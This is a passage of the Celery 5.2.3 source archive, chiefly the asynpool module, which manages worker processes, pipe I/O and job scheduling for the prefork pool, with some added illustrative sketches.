pool implementation by name.""" return symbol_by_name(cls, ALIASES) def get_available_pool_names(): """Return all available pool type names.""" return tuple(ALIASES.keys()) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1640755259.0 celery-5.2.3/celery/concurrency/asynpool.py0000664000175000017500000014346500000000000020745 0ustar00asifasif00000000000000"""Version of multiprocessing.Pool using Async I/O. .. note:: This module will be moved soon, so don't use it directly. This is a non-blocking version of :class:`multiprocessing.Pool`. This code deals with three major challenges: #. Starting up child processes and keeping them running. #. Sending jobs to the processes and receiving results back. #. Safely shutting down this system. """ import errno import gc import os import select import time from collections import Counter, deque, namedtuple from io import BytesIO from numbers import Integral from pickle import HIGHEST_PROTOCOL from struct import pack, unpack, unpack_from from time import sleep from weakref import WeakValueDictionary, ref from billiard import pool as _pool from billiard.compat import buf_t, isblocking, setblocking from billiard.pool import ACK, NACK, RUN, TERMINATE, WorkersJoined from billiard.queues import _SimpleQueue from kombu.asynchronous import ERR, WRITE from kombu.serialization import pickle as _pickle from kombu.utils.eventio import SELECT_BAD_FD from kombu.utils.functional import fxrange from vine import promise from celery.utils.functional import noop from celery.utils.log import get_logger from celery.worker import state as worker_state # pylint: disable=redefined-outer-name # We cache globals and attribute lookups, so disable this warning. 
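# Illustrative sketch (editor-added, not part of this module): resolving a pool
# class through the alias factory defined in celery/concurrency/__init__.py
# above.  The 'threads' alias is only registered when concurrent.futures is
# importable.

def _example_resolve_pool(alias='prefork'):
    from celery.concurrency import get_available_pool_names, get_implementation

    assert alias in get_available_pool_names()
    # 'prefork' resolves to celery.concurrency.prefork:TaskPool via symbol_by_name.
    return get_implementation(alias)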
try: from _billiard import read as __read__ readcanbuf = True except ImportError: # pragma: no cover def __read__(fd, buf, size, read=os.read): chunk = read(fd, size) n = len(chunk) if n != 0: buf.write(chunk) return n readcanbuf = False def unpack_from(fmt, iobuf, unpack=unpack): # noqa return unpack(fmt, iobuf.getvalue()) # <-- BytesIO __all__ = ('AsynPool',) logger = get_logger(__name__) error, debug = logger.error, logger.debug UNAVAIL = frozenset({errno.EAGAIN, errno.EINTR}) #: Constant sent by child process when started (ready to accept work) WORKER_UP = 15 #: A process must've started before this timeout (in secs.) expires. PROC_ALIVE_TIMEOUT = 4.0 SCHED_STRATEGY_FCFS = 1 SCHED_STRATEGY_FAIR = 4 SCHED_STRATEGIES = { None: SCHED_STRATEGY_FAIR, 'default': SCHED_STRATEGY_FAIR, 'fast': SCHED_STRATEGY_FCFS, 'fcfs': SCHED_STRATEGY_FCFS, 'fair': SCHED_STRATEGY_FAIR, } SCHED_STRATEGY_TO_NAME = {v: k for k, v in SCHED_STRATEGIES.items()} Ack = namedtuple('Ack', ('id', 'fd', 'payload')) def gen_not_started(gen): """Return true if generator is not started.""" # gi_frame is None when generator stopped. return gen.gi_frame and gen.gi_frame.f_lasti == -1 def _get_job_writer(job): try: writer = job._writer except AttributeError: pass else: return writer() # is a weakref if hasattr(select, 'poll'): def _select_imp(readers=None, writers=None, err=None, timeout=0, poll=select.poll, POLLIN=select.POLLIN, POLLOUT=select.POLLOUT, POLLERR=select.POLLERR): poller = poll() register = poller.register if readers: [register(fd, POLLIN) for fd in readers] if writers: [register(fd, POLLOUT) for fd in writers] if err: [register(fd, POLLERR) for fd in err] R, W = set(), set() timeout = 0 if timeout and timeout < 0 else round(timeout * 1e3) events = poller.poll(timeout) for fd, event in events: if not isinstance(fd, Integral): fd = fd.fileno() if event & POLLIN: R.add(fd) if event & POLLOUT: W.add(fd) if event & POLLERR: R.add(fd) return R, W, 0 else: def _select_imp(readers=None, writers=None, err=None, timeout=0): r, w, e = select.select(readers, writers, err, timeout) if e: r = list(set(r) | set(e)) return r, w, 0 def _select(readers=None, writers=None, err=None, timeout=0, poll=_select_imp): """Simple wrapper to :class:`~select.select`, using :`~select.poll`. Arguments: readers (Set[Fd]): Set of reader fds to test if readable. writers (Set[Fd]): Set of writer fds to test if writable. err (Set[Fd]): Set of fds to test for error condition. All fd sets passed must be mutable as this function will remove non-working fds from them, this also means the caller must make sure there are still fds in the sets before calling us again. Returns: Tuple[Set, Set, Set]: of ``(readable, writable, again)``, where ``readable`` is a set of fds that have data available for read, ``writable`` is a set of fds that's ready to be written to and ``again`` is a flag that if set means the caller must throw away the result and call us again. 
""" readers = set() if readers is None else readers writers = set() if writers is None else writers err = set() if err is None else err try: return poll(readers, writers, err, timeout) except OSError as exc: _errno = exc.errno if _errno == errno.EINTR: return set(), set(), 1 elif _errno in SELECT_BAD_FD: for fd in readers | writers | err: try: select.select([fd], [], [], 0) except OSError as exc: _errno = exc.errno if _errno not in SELECT_BAD_FD: raise readers.discard(fd) writers.discard(fd) err.discard(fd) return set(), set(), 1 else: raise def iterate_file_descriptors_safely(fds_iter, source_data, hub_method, *args, **kwargs): """Apply hub method to fds in iter, remove from list if failure. Some file descriptors may become stale through OS reasons or possibly other reasons, so safely manage our lists of FDs. :param fds_iter: the file descriptors to iterate and apply hub_method :param source_data: data source to remove FD if it renders OSError :param hub_method: the method to call with with each fd and kwargs :*args to pass through to the hub_method; with a special syntax string '*fd*' represents a substitution for the current fd object in the iteration (for some callers). :**kwargs to pass through to the hub method (no substitutions needed) """ def _meta_fd_argument_maker(): # uses the current iterations value for fd call_args = args if "*fd*" in call_args: call_args = [fd if arg == "*fd*" else arg for arg in args] return call_args # Track stale FDs for cleanup possibility stale_fds = [] for fd in fds_iter: # Handle using the correct arguments to the hub method hub_args, hub_kwargs = _meta_fd_argument_maker(), kwargs try: # Call the hub method hub_method(fd, *hub_args, **hub_kwargs) except (OSError, FileNotFoundError): logger.warning( "Encountered OSError when accessing fd %s ", fd, exc_info=True) stale_fds.append(fd) # take note of stale fd # Remove now defunct fds from the managed list if source_data: for fd in stale_fds: try: if hasattr(source_data, 'remove'): source_data.remove(fd) else: # then not a list/set ... try dict source_data.pop(fd, None) except ValueError: logger.warning("ValueError trying to invalidate %s from %s", fd, source_data) class Worker(_pool.Worker): """Pool worker process.""" def on_loop_start(self, pid): # our version sends a WORKER_UP message when the process is ready # to accept work, this will tell the parent that the inqueue fd # is writable. 
self.outq.put((WORKER_UP, (pid,))) class ResultHandler(_pool.ResultHandler): """Handles messages from the pool processes.""" def __init__(self, *args, **kwargs): self.fileno_to_outq = kwargs.pop('fileno_to_outq') self.on_process_alive = kwargs.pop('on_process_alive') super().__init__(*args, **kwargs) # add our custom message handler self.state_handlers[WORKER_UP] = self.on_process_alive def _recv_message(self, add_reader, fd, callback, __read__=__read__, readcanbuf=readcanbuf, BytesIO=BytesIO, unpack_from=unpack_from, load=_pickle.load): Hr = Br = 0 if readcanbuf: buf = bytearray(4) bufv = memoryview(buf) else: buf = bufv = BytesIO() # header while Hr < 4: try: n = __read__( fd, bufv[Hr:] if readcanbuf else bufv, 4 - Hr, ) except OSError as exc: if exc.errno not in UNAVAIL: raise yield else: if n == 0: raise (OSError('End of file during message') if Hr else EOFError()) Hr += n body_size, = unpack_from('>i', bufv) if readcanbuf: buf = bytearray(body_size) bufv = memoryview(buf) else: buf = bufv = BytesIO() while Br < body_size: try: n = __read__( fd, bufv[Br:] if readcanbuf else bufv, body_size - Br, ) except OSError as exc: if exc.errno not in UNAVAIL: raise yield else: if n == 0: raise (OSError('End of file during message') if Br else EOFError()) Br += n add_reader(fd, self.handle_event, fd) if readcanbuf: message = load(BytesIO(bufv)) else: bufv.seek(0) message = load(bufv) if message: callback(message) def _make_process_result(self, hub): """Coroutine reading messages from the pool processes.""" fileno_to_outq = self.fileno_to_outq on_state_change = self.on_state_change add_reader = hub.add_reader remove_reader = hub.remove_reader recv_message = self._recv_message def on_result_readable(fileno): try: fileno_to_outq[fileno] except KeyError: # process gone return remove_reader(fileno) it = recv_message(add_reader, fileno, on_state_change) try: next(it) except StopIteration: pass except (OSError, EOFError): remove_reader(fileno) else: add_reader(fileno, it) return on_result_readable def register_with_event_loop(self, hub): self.handle_event = self._make_process_result(hub) def handle_event(self, *args): # pylint: disable=method-hidden # register_with_event_loop overrides this raise RuntimeError('Not registered with event loop') def on_stop_not_started(self): # This is always used, since we do not start any threads. cache = self.cache check_timeouts = self.check_timeouts fileno_to_outq = self.fileno_to_outq on_state_change = self.on_state_change join_exited_workers = self.join_exited_workers # flush the processes outqueues until they've all terminated. outqueues = set(fileno_to_outq) while cache and outqueues and self._state != TERMINATE: if check_timeouts is not None: # make sure tasks with a time limit will time out. check_timeouts() # cannot iterate and remove at the same time pending_remove_fd = set() for fd in outqueues: iterate_file_descriptors_safely( [fd], self.fileno_to_outq, self._flush_outqueue, pending_remove_fd.add, fileno_to_outq, on_state_change ) try: join_exited_workers(shutdown=True) except WorkersJoined: debug('result handler: all workers terminated') return outqueues.difference_update(pending_remove_fd) def _flush_outqueue(self, fd, remove, process_index, on_state_change): try: proc = process_index[fd] except KeyError: # process already found terminated # this means its outqueue has already been processed # by the worker lost handler. 
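# Illustrative sketch (editor-added, not part of the original module): the wire
# framing that ``_recv_message`` above decodes and ``send_job``/``_create_payload``
# below produce -- a 4-byte big-endian length prefix followed by a pickled body.

def _example_frame_roundtrip():
    import pickle
    from struct import pack, unpack

    payload = ('hello', (1, 2, 3))
    body = pickle.dumps(payload)
    frame = pack('>I', len(body)) + body

    size, = unpack('>I', frame[:4])
    assert pickle.loads(frame[4:4 + size]) == payload
    return frame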
return remove(fd) reader = proc.outq._reader try: setblocking(reader, 1) except OSError: return remove(fd) try: if reader.poll(0): task = reader.recv() else: task = None sleep(0.5) except (OSError, EOFError): return remove(fd) else: if task: on_state_change(task) finally: try: setblocking(reader, 0) except OSError: return remove(fd) class AsynPool(_pool.Pool): """AsyncIO Pool (no threads).""" ResultHandler = ResultHandler Worker = Worker #: Set by :meth:`register_with_event_loop` after running the first time. _registered_with_event_loop = False def WorkerProcess(self, worker): worker = super().WorkerProcess(worker) worker.dead = False return worker def __init__(self, processes=None, synack=False, sched_strategy=None, proc_alive_timeout=None, *args, **kwargs): self.sched_strategy = SCHED_STRATEGIES.get(sched_strategy, sched_strategy) processes = self.cpu_count() if processes is None else processes self.synack = synack # create queue-pairs for all our processes in advance. self._queues = { self.create_process_queues(): None for _ in range(processes) } # inqueue fileno -> process mapping self._fileno_to_inq = {} # outqueue fileno -> process mapping self._fileno_to_outq = {} # synqueue fileno -> process mapping self._fileno_to_synq = {} # We keep track of processes that haven't yet # sent a WORKER_UP message. If a process fails to send # this message within _proc_alive_timeout we terminate it # and hope the next process will recover. self._proc_alive_timeout = ( PROC_ALIVE_TIMEOUT if proc_alive_timeout is None else proc_alive_timeout ) self._waiting_to_start = set() # denormalized set of all inqueues. self._all_inqueues = set() # Set of fds being written to (busy) self._active_writes = set() # Set of active co-routines currently writing jobs. self._active_writers = set() # Set of fds that are busy (executing task) self._busy_workers = set() self._mark_worker_as_available = self._busy_workers.discard # Holds jobs waiting to be written to child processes. self.outbound_buffer = deque() self.write_stats = Counter() super().__init__(processes, *args, **kwargs) for proc in self._pool: # create initial mappings, these will be updated # as processes are recycled, or found lost elsewhere. self._fileno_to_outq[proc.outqR_fd] = proc self._fileno_to_synq[proc.synqW_fd] = proc self.on_soft_timeout = getattr( self._timeout_handler, 'on_soft_timeout', noop, ) self.on_hard_timeout = getattr( self._timeout_handler, 'on_hard_timeout', noop, ) def _create_worker_process(self, i): gc.collect() # Issue #2927 return super()._create_worker_process(i) def _event_process_exit(self, hub, proc): # This method is called whenever the process sentinel is readable. self._untrack_child_process(proc, hub) self.maintain_pool() def _track_child_process(self, proc, hub): """Helper method determines appropriate fd for process.""" try: fd = proc._sentinel_poll except AttributeError: # we need to duplicate the fd here to carefully # control when the fd is removed from the process table, # as once the original fd is closed we cannot unregister # the fd from epoll(7) anymore, causing a 100% CPU poll loop. 
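# Illustrative sketch (editor-added, not part of the original module): the
# ``PROC_ALIVE_TIMEOUT`` default used above can be raised per app; the prefork
# TaskPool passes ``app.conf.worker_proc_alive_timeout`` through to this pool's
# ``proc_alive_timeout`` argument.

def _example_configure_proc_alive_timeout():
    from celery import Celery

    app = Celery('example', broker='memory://')
    app.conf.worker_proc_alive_timeout = 10.0   # default is 4.0 seconds
    return app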
fd = proc._sentinel_poll = os.dup(proc._popen.sentinel) # Safely call hub.add_reader for the determined fd iterate_file_descriptors_safely( [fd], None, hub.add_reader, self._event_process_exit, hub, proc) def _untrack_child_process(self, proc, hub): if proc._sentinel_poll is not None: fd, proc._sentinel_poll = proc._sentinel_poll, None hub.remove(fd) os.close(fd) def register_with_event_loop(self, hub): """Register the async pool with the current event loop.""" self._result_handler.register_with_event_loop(hub) self.handle_result_event = self._result_handler.handle_event self._create_timelimit_handlers(hub) self._create_process_handlers(hub) self._create_write_handlers(hub) # Add handler for when a process exits (calls maintain_pool) [self._track_child_process(w, hub) for w in self._pool] # Handle_result_event is called whenever one of the # result queues are readable. iterate_file_descriptors_safely( self._fileno_to_outq, self._fileno_to_outq, hub.add_reader, self.handle_result_event, '*fd*') # Timers include calling maintain_pool at a regular interval # to be certain processes are restarted. for handler, interval in self.timers.items(): hub.call_repeatedly(interval, handler) # Add on_poll_start to the event loop only once to prevent duplication # when the Consumer restarts due to a connection error. if not self._registered_with_event_loop: hub.on_tick.add(self.on_poll_start) self._registered_with_event_loop = True def _create_timelimit_handlers(self, hub): """Create handlers used to implement time limits.""" call_later = hub.call_later trefs = self._tref_for_id = WeakValueDictionary() def on_timeout_set(R, soft, hard): if soft: trefs[R._job] = call_later( soft, self._on_soft_timeout, R._job, soft, hard, hub, ) elif hard: trefs[R._job] = call_later( hard, self._on_hard_timeout, R._job, ) self.on_timeout_set = on_timeout_set def _discard_tref(job): try: tref = trefs.pop(job) tref.cancel() del tref except (KeyError, AttributeError): pass # out of scope self._discard_tref = _discard_tref def on_timeout_cancel(R): _discard_tref(R._job) self.on_timeout_cancel = on_timeout_cancel def _on_soft_timeout(self, job, soft, hard, hub): # only used by async pool. if hard: self._tref_for_id[job] = hub.call_later( hard - soft, self._on_hard_timeout, job, ) try: result = self._cache[job] except KeyError: pass # job ready else: self.on_soft_timeout(result) finally: if not hard: # remove tref self._discard_tref(job) def _on_hard_timeout(self, job): # only used by async pool. 
try: result = self._cache[job] except KeyError: pass # job ready else: self.on_hard_timeout(result) finally: # remove tref self._discard_tref(job) def on_job_ready(self, job, i, obj, inqW_fd): self._mark_worker_as_available(inqW_fd) def _create_process_handlers(self, hub): """Create handlers called on process up/down, etc.""" add_reader, remove_reader, remove_writer = ( hub.add_reader, hub.remove_reader, hub.remove_writer, ) cache = self._cache all_inqueues = self._all_inqueues fileno_to_inq = self._fileno_to_inq fileno_to_outq = self._fileno_to_outq fileno_to_synq = self._fileno_to_synq busy_workers = self._busy_workers handle_result_event = self.handle_result_event process_flush_queues = self.process_flush_queues waiting_to_start = self._waiting_to_start def verify_process_alive(proc): proc = proc() # is a weakref if (proc is not None and proc._is_alive() and proc in waiting_to_start): assert proc.outqR_fd in fileno_to_outq assert fileno_to_outq[proc.outqR_fd] is proc assert proc.outqR_fd in hub.readers error('Timed out waiting for UP message from %r', proc) os.kill(proc.pid, 9) def on_process_up(proc): """Called when a process has started.""" # If we got the same fd as a previous process then we'll also # receive jobs in the old buffer, so we need to reset the # job._write_to and job._scheduled_for attributes used to recover # message boundaries when processes exit. infd = proc.inqW_fd for job in cache.values(): if job._write_to and job._write_to.inqW_fd == infd: job._write_to = proc if job._scheduled_for and job._scheduled_for.inqW_fd == infd: job._scheduled_for = proc fileno_to_outq[proc.outqR_fd] = proc # maintain_pool is called whenever a process exits. self._track_child_process(proc, hub) assert not isblocking(proc.outq._reader) # handle_result_event is called when the processes outqueue is # readable. add_reader(proc.outqR_fd, handle_result_event, proc.outqR_fd) waiting_to_start.add(proc) hub.call_later( self._proc_alive_timeout, verify_process_alive, ref(proc), ) self.on_process_up = on_process_up def _remove_from_index(obj, proc, index, remove_fun, callback=None): # this remove the file descriptors for a process from # the indices. we have to make sure we don't overwrite # another processes fds, as the fds may be reused. try: fd = obj.fileno() except OSError: return try: if index[fd] is proc: # fd hasn't been reused so we can remove it from index. 
index.pop(fd, None) except KeyError: pass else: remove_fun(fd) if callback is not None: callback(fd) return fd def on_process_down(proc): """Called when a worker process exits.""" if getattr(proc, 'dead', None): return process_flush_queues(proc) _remove_from_index( proc.outq._reader, proc, fileno_to_outq, remove_reader, ) if proc.synq: _remove_from_index( proc.synq._writer, proc, fileno_to_synq, remove_writer, ) inq = _remove_from_index( proc.inq._writer, proc, fileno_to_inq, remove_writer, callback=all_inqueues.discard, ) if inq: busy_workers.discard(inq) self._untrack_child_process(proc, hub) waiting_to_start.discard(proc) self._active_writes.discard(proc.inqW_fd) remove_writer(proc.inq._writer) remove_reader(proc.outq._reader) if proc.synqR_fd: remove_reader(proc.synq._reader) if proc.synqW_fd: self._active_writes.discard(proc.synqW_fd) remove_reader(proc.synq._writer) self.on_process_down = on_process_down def _create_write_handlers(self, hub, pack=pack, dumps=_pickle.dumps, protocol=HIGHEST_PROTOCOL): """Create handlers used to write data to child processes.""" fileno_to_inq = self._fileno_to_inq fileno_to_synq = self._fileno_to_synq outbound = self.outbound_buffer pop_message = outbound.popleft put_message = outbound.append all_inqueues = self._all_inqueues active_writes = self._active_writes active_writers = self._active_writers busy_workers = self._busy_workers diff = all_inqueues.difference add_writer = hub.add_writer hub_add, hub_remove = hub.add, hub.remove mark_write_fd_as_active = active_writes.add mark_write_gen_as_active = active_writers.add mark_worker_as_busy = busy_workers.add write_generator_done = active_writers.discard get_job = self._cache.__getitem__ write_stats = self.write_stats is_fair_strategy = self.sched_strategy == SCHED_STRATEGY_FAIR revoked_tasks = worker_state.revoked getpid = os.getpid precalc = {ACK: self._create_payload(ACK, (0,)), NACK: self._create_payload(NACK, (0,))} def _put_back(job, _time=time.time): # puts back at the end of the queue if job._terminated is not None or \ job.correlation_id in revoked_tasks: if not job._accepted: job._ack(None, _time(), getpid(), None) job._set_terminated(job._terminated) else: # XXX linear lookup, should find a better way, # but this happens rarely and is here to protect against races. if job not in outbound: outbound.appendleft(job) self._put_back = _put_back # called for every event loop iteration, and if there # are messages pending this will schedule writing one message # by registering the 'schedule_writes' function for all currently # inactive inqueues (not already being written to) # consolidate means the event loop will merge them # and call the callback once with the list writable fds as # argument. Using this means we minimize the risk of having # the same fd receive every task if the pipe read buffer is not # full. 
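# Illustrative sketch (editor-added, not part of the original module): the
# condition evaluated by ``on_poll_start`` below under the fair scheduling
# strategy -- writes are only scheduled while jobs are queued and at least one
# inqueue belongs to a non-busy worker.

def _example_should_schedule_writes(queued_jobs, busy_workers, all_inqueues,
                                     fair=True):
    if fair:
        return bool(queued_jobs) and len(busy_workers) < len(all_inqueues)
    return bool(queued_jobs)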
def on_poll_start(): # Determine which io descriptors are not busy inactive = diff(active_writes) # Determine hub_add vs hub_remove strategy conditional if is_fair_strategy: # outbound buffer present and idle workers exist add_cond = outbound and len(busy_workers) < len(all_inqueues) else: # default is add when data exists in outbound buffer add_cond = outbound if add_cond: # calling hub_add vs hub_remove iterate_file_descriptors_safely( inactive, all_inqueues, hub_add, None, WRITE | ERR, consolidate=True) else: iterate_file_descriptors_safely( inactive, all_inqueues, hub_remove) self.on_poll_start = on_poll_start def on_inqueue_close(fd, proc): # Makes sure the fd is removed from tracking when # the connection is closed, this is essential as fds may be reused. busy_workers.discard(fd) try: if fileno_to_inq[fd] is proc: fileno_to_inq.pop(fd, None) active_writes.discard(fd) all_inqueues.discard(fd) except KeyError: pass self.on_inqueue_close = on_inqueue_close self.hub_remove = hub_remove def schedule_writes(ready_fds, total_write_count=None): if not total_write_count: total_write_count = [0] # Schedule write operation to ready file descriptor. # The file descriptor is writable, but that does not # mean the process is currently reading from the socket. # The socket is buffered so writable simply means that # the buffer can accept at least 1 byte of data. # This means we have to cycle between the ready fds. # the first version used shuffle, but this version # using `total_writes % ready_fds` is about 30% faster # with many processes, and also leans more towards fairness # in write stats when used with many processes # [XXX On macOS, this may vary depending # on event loop implementation (i.e, select/poll vs epoll), so # have to test further] num_ready = len(ready_fds) for _ in range(num_ready): ready_fd = ready_fds[total_write_count[0] % num_ready] total_write_count[0] += 1 if ready_fd in active_writes: # already writing to this fd continue if is_fair_strategy and ready_fd in busy_workers: # worker is already busy with another task continue if ready_fd not in all_inqueues: hub_remove(ready_fd) continue try: job = pop_message() except IndexError: # no more messages, remove all inactive fds from the hub. # this is important since the fds are always writable # as long as there's 1 byte left in the buffer, and so # this may create a spinloop where the event loop # always wakes up. for inqfd in diff(active_writes): hub_remove(inqfd) break else: if not job._accepted: # job not accepted by another worker try: # keep track of what process the write operation # was scheduled for. proc = job._scheduled_for = fileno_to_inq[ready_fd] except KeyError: # write was scheduled for this fd but the process # has since exited and the message must be sent to # another process. put_message(job) continue cor = _write_job(proc, ready_fd, job) job._writer = ref(cor) mark_write_gen_as_active(cor) mark_write_fd_as_active(ready_fd) mark_worker_as_busy(ready_fd) # Try to write immediately, in case there's an error. try: next(cor) except StopIteration: pass except OSError as exc: if exc.errno != errno.EBADF: raise else: add_writer(ready_fd, cor) hub.consolidate_callback = schedule_writes def send_job(tup): # Schedule writing job request for when one of the process # inqueues are writable. body = dumps(tup, protocol=protocol) body_size = len(body) header = pack('>I', body_size) # index 1,0 is the job ID. 
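# Illustrative sketch (editor-added, not part of the original module): the
# round-robin descriptor selection used by ``schedule_writes`` above, which
# cycles through the ready fds via ``total_writes % len(ready_fds)`` instead of
# shuffling them.

def _example_round_robin(ready_fds=(4, 7, 9), writes=6):
    order, counter = [], [0]
    for _ in range(writes):
        order.append(ready_fds[counter[0] % len(ready_fds)])
        counter[0] += 1
    return order   # [4, 7, 9, 4, 7, 9] for the defaults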
job = get_job(tup[1][0]) job._payload = buf_t(header), buf_t(body), body_size put_message(job) self._quick_put = send_job def on_not_recovering(proc, fd, job, exc): logger.exception( 'Process inqueue damaged: %r %r: %r', proc, proc.exitcode, exc) if proc._is_alive(): proc.terminate() hub.remove(fd) self._put_back(job) def _write_job(proc, fd, job): # writes job to the worker process. # Operation must complete if more than one byte of data # was written. If the broker connection is lost # and no data was written the operation shall be canceled. header, body, body_size = job._payload errors = 0 try: # job result keeps track of what process the job is sent to. job._write_to = proc send = proc.send_job_offset Hw = Bw = 0 # write header while Hw < 4: try: Hw += send(header, Hw) except Exception as exc: # pylint: disable=broad-except if getattr(exc, 'errno', None) not in UNAVAIL: raise # suspend until more data errors += 1 if errors > 100: on_not_recovering(proc, fd, job, exc) raise StopIteration() yield else: errors = 0 # write body while Bw < body_size: try: Bw += send(body, Bw) except Exception as exc: # pylint: disable=broad-except if getattr(exc, 'errno', None) not in UNAVAIL: raise # suspend until more data errors += 1 if errors > 100: on_not_recovering(proc, fd, job, exc) raise StopIteration() yield else: errors = 0 finally: hub_remove(fd) write_stats[proc.index] += 1 # message written, so this fd is now available active_writes.discard(fd) write_generator_done(job._writer()) # is a weakref def send_ack(response, pid, job, fd): # Only used when synack is enabled. # Schedule writing ack response for when the fd is writable. msg = Ack(job, fd, precalc[response]) callback = promise(write_generator_done) cor = _write_ack(fd, msg, callback=callback) mark_write_gen_as_active(cor) mark_write_fd_as_active(fd) callback.args = (cor,) add_writer(fd, cor) self.send_ack = send_ack def _write_ack(fd, ack, callback=None): # writes ack back to the worker if synack enabled. # this operation *MUST* complete, otherwise # the worker process will hang waiting for the ack. header, body, body_size = ack[2] try: try: proc = fileno_to_synq[fd] except KeyError: # process died, we can safely discard the ack at this # point. raise StopIteration() send = proc.send_syn_offset Hw = Bw = 0 # write header while Hw < 4: try: Hw += send(header, Hw) except Exception as exc: # pylint: disable=broad-except if getattr(exc, 'errno', None) not in UNAVAIL: raise yield # write body while Bw < body_size: try: Bw += send(body, Bw) except Exception as exc: # pylint: disable=broad-except if getattr(exc, 'errno', None) not in UNAVAIL: raise # suspend until more data yield finally: if callback: callback() # message written, so this fd is now available active_writes.discard(fd) def flush(self): if self._state == TERMINATE: return # cancel all tasks that haven't been accepted so that NACK is sent # if synack is enabled. for job in tuple(self._cache.values()): if not job._accepted: if self.synack: job._cancel() else: job.discard() # clear the outgoing buffer as the tasks will be redelivered by # the broker anyway. if self.outbound_buffer: self.outbound_buffer.clear() self.maintain_pool() try: # ...but we must continue writing the payloads we already started # to keep message boundaries. # The messages may be NACK'ed later if synack is enabled. 
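# Illustrative sketch (editor-added, not part of the original module): the
# offset-based write loop that ``_write_job``/``_write_ack`` above apply to the
# header and then the body, stripped of the EAGAIN/retry handling.

def _example_write_all(send, payload):
    # ``send(buf, offset)`` mirrors proc.send_job_offset: it returns how many
    # bytes were written starting at ``offset``.
    written = 0
    while written < len(payload):
        written += send(payload, written)
    return written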
if self._state == RUN: # flush outgoing buffers intervals = fxrange(0.01, 0.1, 0.01, repeatlast=True) owned_by = {} for job in self._cache.values(): writer = _get_job_writer(job) if writer is not None: owned_by[writer] = job while self._active_writers: writers = list(self._active_writers) for gen in writers: if (gen.__name__ == '_write_job' and gen_not_started(gen)): # hasn't started writing the job so can # discard the task, but we must also remove # it from the Pool._cache. try: job = owned_by[gen] except KeyError: pass else: # removes from Pool._cache job.discard() self._active_writers.discard(gen) else: try: job = owned_by[gen] except KeyError: pass else: job_proc = job._write_to if job_proc._is_alive(): self._flush_writer(job_proc, gen) # workers may have exited in the meantime. self.maintain_pool() sleep(next(intervals)) # don't busyloop finally: self.outbound_buffer.clear() self._active_writers.clear() self._active_writes.clear() self._busy_workers.clear() def _flush_writer(self, proc, writer): fds = {proc.inq._writer} try: while fds: if not proc._is_alive(): break # process exited readable, writable, again = _select( writers=fds, err=fds, timeout=0.5, ) if not again and (writable or readable): try: next(writer) except (StopIteration, OSError, EOFError): break finally: self._active_writers.discard(writer) def get_process_queues(self): """Get queues for a new process. Here we'll find an unused slot, as there should always be one available when we start a new process. """ return next(q for q, owner in self._queues.items() if owner is None) def on_grow(self, n): """Grow the pool by ``n`` processes.""" diff = max(self._processes - len(self._queues), 0) if diff: self._queues.update({ self.create_process_queues(): None for _ in range(diff) }) def on_shrink(self, n): """Shrink the pool by ``n`` processes.""" def create_process_queues(self): """Create new in, out, etc. queues, returned as a tuple.""" # NOTE: Pipes must be set O_NONBLOCK at creation time (the original # fd), otherwise it won't be possible to change the flags until # there's an actual reader/writer on the other side. inq = _SimpleQueue(wnonblock=True) outq = _SimpleQueue(rnonblock=True) synq = None assert isblocking(inq._reader) assert not isblocking(inq._writer) assert not isblocking(outq._reader) assert isblocking(outq._writer) if self.synack: synq = _SimpleQueue(wnonblock=True) assert isblocking(synq._reader) assert not isblocking(synq._writer) return inq, outq, synq def on_process_alive(self, pid): """Called when receiving the :const:`WORKER_UP` message. Marks the process as ready to receive work. """ try: proc = next(w for w in self._pool if w.pid == pid) except StopIteration: return logger.warning('process with pid=%s already exited', pid) assert proc.inqW_fd not in self._fileno_to_inq assert proc.inqW_fd not in self._all_inqueues self._waiting_to_start.discard(proc) self._fileno_to_inq[proc.inqW_fd] = proc self._fileno_to_synq[proc.synqW_fd] = proc self._all_inqueues.add(proc.inqW_fd) def on_job_process_down(self, job, pid_gone): """Called for each job when the process assigned to it exits.""" if job._write_to and not job._write_to._is_alive(): # job was partially written self.on_partial_read(job, job._write_to) elif job._scheduled_for and not job._scheduled_for._is_alive(): # job was only scheduled to be written to this process, # but no data was sent so put it back on the outbound_buffer. self._put_back(job) def on_job_process_lost(self, job, pid, exitcode): """Called when the process executing job' exits. 
This happens when the process job' was assigned to exited by mysterious means (error exitcodes and signals). """ self.mark_as_worker_lost(job, exitcode) def human_write_stats(self): if self.write_stats is None: return 'N/A' vals = list(self.write_stats.values()) total = sum(vals) def per(v, total): return f'{(float(v) / total) if v else 0:.2f}' return { 'total': total, 'avg': per(total / len(self.write_stats) if total else 0, total), 'all': ', '.join(per(v, total) for v in vals), 'raw': ', '.join(map(str, vals)), 'strategy': SCHED_STRATEGY_TO_NAME.get( self.sched_strategy, self.sched_strategy, ), 'inqueues': { 'total': len(self._all_inqueues), 'active': len(self._active_writes), } } def _process_cleanup_queues(self, proc): """Called to clean up queues after process exit.""" if not proc.dead: try: self._queues[self._find_worker_queues(proc)] = None except (KeyError, ValueError): pass @staticmethod def _stop_task_handler(task_handler): """Called at shutdown to tell processes that we're shutting down.""" for proc in task_handler.pool: try: setblocking(proc.inq._writer, 1) except OSError: pass else: try: proc.inq.put(None) except OSError as exc: if exc.errno != errno.EBADF: raise def create_result_handler(self): return super().create_result_handler( fileno_to_outq=self._fileno_to_outq, on_process_alive=self.on_process_alive, ) def _process_register_queues(self, proc, queues): """Mark new ownership for ``queues`` to update fileno indices.""" assert queues in self._queues b = len(self._queues) self._queues[queues] = proc assert b == len(self._queues) def _find_worker_queues(self, proc): """Find the queues owned by ``proc``.""" try: return next(q for q, owner in self._queues.items() if owner == proc) except StopIteration: raise ValueError(proc) def _setup_queues(self): # this is only used by the original pool that used a shared # queue for all processes. self._quick_put = None # these attributes are unused by this class, but we'll still # have to initialize them for compatibility. self._inqueue = self._outqueue = \ self._quick_get = self._poll_result = None def process_flush_queues(self, proc): """Flush all queues. Including the outbound buffer, so that all tasks that haven't been started will be discarded. In Celery this is called whenever the transport connection is lost (consumer restart), and when a process is terminated. """ resq = proc.outq._reader on_state_change = self._result_handler.on_state_change fds = {resq} while fds and not resq.closed and self._state != TERMINATE: readable, _, _ = _select(fds, None, fds, timeout=0.01) if readable: try: task = resq.recv() except (OSError, EOFError) as exc: _errno = getattr(exc, 'errno', None) if _errno == errno.EINTR: continue elif _errno == errno.EAGAIN: break elif _errno not in UNAVAIL: debug('got %r while flushing process %r', exc, proc, exc_info=1) break else: if task is None: debug('got sentinel while flushing process %r', proc) break else: on_state_change(task) else: break def on_partial_read(self, job, proc): """Called when a job was partially written to exited child.""" # worker terminated by signal: # we cannot reuse the sockets again, because we 